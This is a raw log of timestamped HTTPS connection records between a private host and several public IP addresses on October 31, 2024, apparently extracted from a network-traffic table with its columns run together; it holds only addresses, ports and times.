                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.400648117 CET4434989513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.400702000 CET49895443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.400974035 CET49893443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.400983095 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.401187897 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.401201963 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.401281118 CET49895443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.401288033 CET4434989513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.559796095 CET49896443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.559854984 CET44349896206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.560101032 CET49896443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.560298920 CET49896443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.560311079 CET44349896206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666703939 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666743040 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666805983 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666971922 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.666984081 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.063441992 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.064755917 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.064768076 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.064774036 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.065288067 CET49889443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.065294981 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.065707922 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.065969944 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.066034079 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.066838980 CET49889443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.066922903 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.067665100 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.067765951 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.068845987 CET49889443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.068878889 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.069333076 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.069343090 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.071238041 CET4434988552.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.072443008 CET49885443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.072469950 CET4434988552.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.073617935 CET4434988552.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.073684931 CET49885443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.076531887 CET49885443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.076673985 CET4434988552.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.076945066 CET49885443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.076958895 CET4434988552.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.079478025 CET4434988452.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.081510067 CET49884443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.081537962 CET4434988452.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.081625938 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.081892967 CET49890443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.081908941 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.082444906 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.082712889 CET4434988452.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.082778931 CET49884443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.083192110 CET49890443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.083285093 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.083549976 CET49890443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.083576918 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.084109068 CET49884443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.084224939 CET4434988452.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.118848085 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.119054079 CET49885443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.226038933 CET49890443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.226061106 CET49884443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.226082087 CET4434988452.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.326545000 CET49884443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.395745039 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.395920992 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.395951986 CET4434988552.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.395981073 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.395988941 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396051884 CET4434988552.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396100044 CET49885443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396575928 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396579027 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396641016 CET49889443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396648884 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396666050 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396677017 CET49890443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396694899 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396711111 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.396712065 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.397111893 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.397113085 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.397166014 CET49890443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.397198915 CET49889443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.397227049 CET44349896206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.400278091 CET4434988613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.401195049 CET4434989513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.401473999 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.401897907 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.503251076 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.538677931 CET49893443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.538691044 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.538690090 CET49896443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.538716078 CET49895443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.538719893 CET49887443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.538743019 CET49886443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.539494991 CET49892443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.625509024 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.757833958 CET49892443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.757859945 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.758038044 CET49896443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.758068085 CET44349896206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.758732080 CET49887443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.758744955 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.759196997 CET44349896206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.759215117 CET44349896206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.759260893 CET49896443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.760094881 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.760106087 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.760160923 CET49892443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.760194063 CET49887443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.760200024 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.760603905 CET49893443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.760628939 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.761054993 CET49893443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.761061907 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.764559031 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.764569998 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.764731884 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.764754057 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.764806032 CET49886443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.764831066 CET4434988613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.765245914 CET49886443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.765254021 CET4434988613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.765559912 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.765572071 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.765798092 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.765814066 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.765866995 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.766072035 CET49895443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.766093969 CET4434989513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.766660929 CET49895443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.766669989 CET4434989513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.767134905 CET49896443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.767275095 CET44349896206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.768166065 CET49892443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.768232107 CET49890443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.768251896 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.768256903 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.774593115 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.774780035 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.775243998 CET49896443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.775274992 CET44349896206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.775490999 CET49892443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.775509119 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.775748968 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.775758028 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.778350115 CET49885443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.778378010 CET4434988552.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.780075073 CET49889443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.780102968 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.781407118 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.781418085 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.794435024 CET49902443192.168.2.918.239.18.88
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.794492960 CET4434990218.239.18.88192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.794569969 CET49902443192.168.2.918.239.18.88
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.794873953 CET49902443192.168.2.918.239.18.88
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.794888020 CET4434990218.239.18.88192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.835413933 CET49896443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.835417986 CET49892443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.893558979 CET4434988613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.893635035 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.893665075 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.893721104 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.893759966 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.893805027 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.893892050 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.893898010 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.893917084 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.893982887 CET4434988613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894023895 CET49886443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894099951 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894141912 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894179106 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894345999 CET49886443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894372940 CET4434988613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894407988 CET49886443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894414902 CET4434988613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894738913 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894764900 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894809961 CET49893443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894829035 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894843102 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.894893885 CET49893443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.895431042 CET49893443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.895447969 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.895459890 CET49893443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.895467043 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.896754980 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.896775007 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.896821022 CET49887443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.896836996 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.896851063 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.896893024 CET49887443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.897819996 CET49903443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.897857904 CET4434990313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.897927999 CET49903443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.897958994 CET4434989513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.898123980 CET4434989513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.898171902 CET49895443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.898227930 CET49895443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.898232937 CET4434989513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.898242950 CET49887443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.898247004 CET49895443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.898250103 CET4434989513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.898251057 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.898261070 CET49887443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.898264885 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.899431944 CET49903443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.899449110 CET4434990313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901019096 CET49904443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901051044 CET4434990413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901215076 CET49905443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901226997 CET49904443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901257038 CET4434990513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901308060 CET49905443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901545048 CET49905443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901556969 CET4434990513.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901747942 CET49904443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901747942 CET49906443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901761055 CET4434990413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901772022 CET4434990613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901829004 CET49906443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901967049 CET49906443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.901977062 CET4434990613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.902875900 CET49907443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.902898073 CET4434990713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.902950048 CET49907443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.903048038 CET49907443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.903057098 CET4434990713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:09.929034948 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.023539066 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.023602009 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.023648024 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.023659945 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.023757935 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.023806095 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.026734114 CET49899443192.168.2.952.50.97.18
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.026750088 CET4434989952.50.97.18192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.040043116 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.040095091 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.040127993 CET49892443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.040134907 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.040574074 CET49910443192.168.2.952.214.60.57
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.040599108 CET4434991052.214.60.57192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:10.040654898 CET49910443192.168.2.952.214.60.57
